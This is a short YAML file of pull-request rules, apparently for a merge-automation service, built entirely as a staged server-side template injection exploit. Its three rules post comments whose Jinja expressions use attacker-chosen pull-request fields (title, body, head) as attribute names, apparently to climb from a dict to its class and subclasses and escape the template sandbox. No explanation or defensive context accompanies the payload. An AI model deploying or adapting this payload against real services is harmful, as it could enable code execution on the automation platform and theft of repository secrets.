pull_request_rules:
  - name: smuggled-globals
    conditions:
      - base=main
    actions:
      comment:
        message: |
          STEP1 title={{ title }}
          STEP1 RESULT={{ ([dict]|map(attribute=title))|first }}
  - name: smuggled-class
    conditions:
      - base=main
    actions:
      comment:
        message: |
          STEP2 RESULT={{ ([dict]|map(attribute=title))|first|attr(body) }}
  - name: smuggled-subclasses
    conditions:
      - base=main
    actions:
      comment:
        message: |
          STEP3 RESULT={{ ([dict]|map(attribute=title))|first|attr(body)|attr(head) }}
